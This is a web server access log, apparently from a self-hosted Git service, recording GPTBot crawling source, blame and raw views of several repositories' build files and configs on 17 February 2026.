"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10182] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10181] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10182] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fstatus.json" [Client 74.7.227.38] [Length 22613] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" -[17/Feb/2026:15:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html%2fstatus.json" [Client 74.7.227.38] [Length 17234] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:15:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2ftemplates%2findex.html" [Client 74.7.227.38] [Length 29274] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11906] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" -[17/Feb/2026:15:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11907] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" -[17/Feb/2026:15:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15258] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2fstatus.json" [Client 74.7.227.38] [Length 16939] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:15:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" -[17/Feb/2026:15:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13153] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" -[17/Feb/2026:15:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" -[17/Feb/2026:15:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 14504] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:15:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9947] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10464] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:15:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:25:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:15:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/PythonTest/README.md" -[17/Feb/2026:15:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 20826] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10171] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 14775] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 20146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11601] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:15:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2findex.html" [Client 74.7.227.38] [Length 36375] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -[17/Feb/2026:15:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 